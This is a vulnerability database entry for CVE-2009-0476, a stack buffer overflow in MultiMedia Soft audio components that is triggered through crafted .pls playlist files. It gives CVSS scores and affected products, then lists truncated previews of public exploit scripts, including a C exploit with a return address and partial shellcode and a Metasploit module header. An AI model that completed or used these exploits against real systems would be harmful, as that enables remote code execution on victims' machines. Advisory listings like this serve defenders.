9.3
CVSSv2

CVE-2009-0476

Published: 08/02/2009 Updated: 11/10/2018
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 965
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in MultiMedia Soft AdjMmsEng.dll 7.11.1.0 and 7.11.2.7, as distributed in multiple MultiMedia Soft audio components for .NET, allows remote malicious users to execute arbitrary code via a long string in a playlist (.pls) file, as originally reported for Euphonics Audio Player 1.0. NOTE: some of these details are obtained from third party information.

Vulnerable Product Search on Vulmon Subscribe to Product

multimediasoft audio dj studio for .net -

multimediasoft audio sound recorder for .net -

multimediasoft audio sound editer for .net -

multimediasoft audio sound suite for .net -

multimediasoft audio sound studio for .net -

Exploits

#!/usr/bin/perl =gnk ============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | ...
#!/usr/bin/ruby # # Exploit Title : Audiotran 141 Win XP SP2/SP3 English Buffer Overflow # Date : January 9th, 2010 # Author : Sébastien Duquette # Software Link : wwwe-softcouk/Audiotranhtm # Version : 141 # OS : Windows # Tested on : XP SP2/SP3 En (VMware) # Type of vuln : Stack Overflow / SEH ...
#include <stdioh> #include <windowsh> #include <stringh> #define overflow 1324 #define NOP 0x90 #define pls "Eyepls" int main (int argc,char **argv) { char winsp3[] = "\x7B\x46\x86\x7C"; char buffer[overflow]; FILE *Player; unsigned char shellcode[] = "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xec" "\x96\x ...
## # $Id: audiotran_plsrb 8306 2010-01-28 21:04:01Z swtornio $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' class ...
#!/usr/bin/perl -w #----------------------------------------------------------------------------- # Author : Houssamix # Euphonics Audio Player v10 (pls) Universal Local Buffer Overflow Exploit # Gr33tz to : str0ke , real-powernet , Legend-spy - stack # thx to h4ck3r#47 for the fisrt exploit milw0rmcom/exploits/7958 # just the ret adr ...
#!/usr/bin/perl -w #----------------------------------------------------------------------------- # Author : h4ck3r#47 # Euphonics Audio Player v10 (pls) Local Buffer Overflow Exploit # Tested in Windows Pro Sp3 (English) # Gr33tz to : str0ke , TNT:18 , AlpHaNiX , All arab4servicesnet and friends #---------------------------------------------- ...
#MP3 Workstation Version 92112 SEH exploit #Author Sanjeev Gupta sangupta86[at]gmailcom #Download Vulnerable application from wwwe-softcouk/MP3%20Workstationhtm #Vulnerable version MP3 Workstation Version 92112 #Tested on XP SP2 #Greets Puneet Jain my $head = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0D\x0A\x46\x69\x6C\x ...